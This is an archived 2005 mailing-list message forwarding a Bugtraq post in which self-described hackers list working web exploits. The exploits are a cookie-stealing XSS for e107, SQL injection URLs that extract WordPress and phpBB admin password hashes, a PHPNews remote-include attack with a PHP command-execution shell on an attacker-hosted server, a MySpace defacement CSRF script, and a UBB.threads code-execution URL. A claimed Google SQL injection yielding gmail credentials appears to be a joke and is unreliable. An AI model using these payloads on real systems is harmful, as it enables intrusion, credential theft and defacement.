From: Michael Shigorin <mike@osdn.org.ua> To: smoke-room@altlinux.ru Subject: [room] Fwd: Multiple CMS/Forum Vulnablilties Date: Mon, 29 Aug 2005 22:45:06 +0300 Message-ID: <20050829194506.GT13435@osdn.org.ua> (raw) Гыг. ----- Forwarded message from "pacifico, 0] //--></script>a" <jbiaso/gmail.com> ----- Date: Sat, 27 Aug 2005 20:36:10 -0400 From: "pacifico\", 0] //--></script>a" <jbiaso/gmail.com> To: bugtraq/securityfocus.com Subject: Multiple CMS/Forum Vulnablilties ################################# # Multi-CMS/Forum Vulnability's # # Found by ap0c hackers # # pacifico & ratboy # ################################# Yo! Ok, well a couple new vulnabilitys have been found by.. us :) ------------------ First; e107 xss--- ------------------ [link=http://w000000w00tw00t/asdadLI[link= onMouseOver='alert(document.cookie);' h1d3="]<[size=24]HIGHLIGHT ME!!11!1!!!!!1111!!!!!!11!!1!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![/size]>[/link][link=h1d3me=']][/link][/link] Enter this into any message, signature, et cetra, and when highlighted it will alert with the users cookie. This *may* be furtherly exploitable; but we are not sure; as we've been very busy ;) ------ next; wordpress blog sql injection --- ------ http://path/to/wordpress/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/* This will give the administrator hash for the wordpress blog/CMS. We have also found that if you spoof you're browser to something like: <?php phpinfo(); ?>, and have a failed login attempt; it is eval'd, and you can execute your own code. ------ Now; PHPNews latest release remote include(); exploit ------ http://path/to/php/news/auth.php?path=http://path/to/exploit/&c=uname%20-a Ok, now you'll need a host, and change (http://path/to/exploit/) to your host. Now, you will make a directory called "languages". Then in a file named "en_GB.admin.lng", put something like this code: <?php $rawr=$_GET['c']; echo(`$rawr`); ?> kthx. ----- And; Knoledge Base PHPBB Mod SQL Injection Exploit ----- Righto.. so you find a phpbb forum that says: 'Powered by Knowledge Base MOD, wGEric & Haplo (c) 2002-2005' at the bottem, eh? Now, this is totally vulnable. (the mod changes the index.php to kb.php) http://path/to/forum/kb.php?mode=article&k=10%20UNION%20SELECT%200,user_password%20FROM%20phpbb_users%20WHERE%20user_id=2%20LIMIT%201/*%20&rush=%00 :) ----- !!!!!!Google.com!!!!!SQL!!!!!Injection!!!!!Exploit!!!!!! ----- Ok, we expect this to be fixed right away, so be sure to do it quick ;) Giving google the query: -b: *++*' UNION SELECT ass,ass from ASS,ass%00/* Cause's an error of "database gm-google.ass does not exist". We've gotten a few user/pass's for gmail with this ;) This is done by confusing googles "calculator", so it does *NOT* check the query to make sure its valid. You'd be suprised how insecure google is; when looked at closly. We also had a bindshell; but they found out; and thats fixed now. ----- MySpace.com User Profile Defacement. ----- Once again, this may be fixed very soon. This code should be efficent; <?php $g1=$_GET['t']; $g2=$_GET['f']; echo(' <form action="http://myspace.com/index.cfm?fuseaction=user.addComment" method="post" name="commentForm"> <input type="hidden" name="hashcode" value="MIGKBgkrBgEEAYI3WAOgfTB7BgorBgEEAYI3WAMBoG0wawIDAgABAgJmAwICAMAECGU6VlkoYLOqBBCZiLLKnlWybUUua3SB/xxzBED1fsg4c0zRcY4B8IWZgNbTdYkd/pUk6zpuLXZZAhwC+oxKfrwgQfy+Qnj7XB4pXWTRvgumgCUHsjtspz8/kt6a"> <input type="hidden" name="FriendID" value="' . $f . '24822493"> <input type=hidden name=Mytoken value=' . $t . '> '); echo (' <input type="hidden" name="f_comments" value='%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTD%3E%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTABLE%3E%3CTR%3E%3Cimg%20src%3D%22http%3A%2F%2Flemonparty.org%2Flemonparty.jpg%22%3E%3CFONT%20SIZE%3D%2224%22%20COLOR%3D%22RED%22%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22down%22%3Eowned.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22left%22%3Eby.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22up%22%3Eap0c.%3C%2Fmarquee%3E%3CBR%3E%3Cnoscript%3E'> <input type="submit" value="Post Comment" onClick="this.disabled = true; document.commentForm.submit();"> </form> '); ?> example url: http://localhost/myspace0wn.php?t=20050827111256&f=6617 This would deface profile 6617 if the (t) variable is that users friend. ktx. ----- Forums ("UBB.threads? 6.3.2") Remote Code Execution. ----- These boards are very popular among corporate sites (*cough*NBC,CNN*cough*) http://bo**ds.n**.***/bb/printthread.php?Board=%22);&main='));%3C?php%20phpinfo();%20?%3E&type=post This would execute phpinfo(); on the victims server. ########################## ## Thats all for this ## ## "issue" of sweet ## ## sploits... sincerly ## ## pacifico and ratboy ## ########################## Contact? jbiaso@gmail.com -EOF- ----- End forwarded message ----- -- ---- WBR, Michael Shigorin <mike@altlinux.ru> ------ Linux.Kiev http://www.linux.kiev.ua/
reply other threads:[~2005-08-29 19:45 UTC|newest] Thread overview: [no followups] expand[flat|nested] mbox.gz Atom feed
Reply instructions: You may reply publicly to this message via plain-text email using any one of the following methods: * Save the following mbox file, import it into your mail client, and reply-to-all from there: mbox Avoid top-posting and favor interleaved quoting: https://en.wikipedia.org/wiki/Posting_style#Interleaved_style * Reply using the --to, --cc, and --in-reply-to switches of git-send-email(1): git send-email \ --in-reply-to=20050829194506.GT13435@osdn.org.ua \ --to=mike@osdn.org.ua \ --cc=shigorin@gmail.com \ --cc=smoke-room@altlinux.ru \ /path/to/YOUR_REPLY https://kernel.org/pub/software/scm/git/docs/git-send-email.html * If your mail client supports setting the In-Reply-To header via mailto: links, try the mailto: link
Культурный офтопик This inbox may be cloned and mirrored by anyone: git clone --mirror http://lore.altlinux.org/smoke-room/0 smoke-room/git/0.git # If you have public-inbox 1.1+ installed, you may # initialize and index your mirror using the following commands: public-inbox-init -V2 smoke-room smoke-room/ http://lore.altlinux.org/smoke-room \ smoke-room@lists.altlinux.org smoke-room@lists.altlinux.ru smoke-room@lists.altlinux.com smoke-room@altlinux.ru smoke-room@altlinux.org smoke-room@altlinux.com public-inbox-index smoke-room Example config snippet for mirrors. Newsgroup available over NNTP: nntp://lore.altlinux.org/org.altlinux.lists.smoke-room AGPL code for this site: git clone https://public-inbox.org/public-inbox.git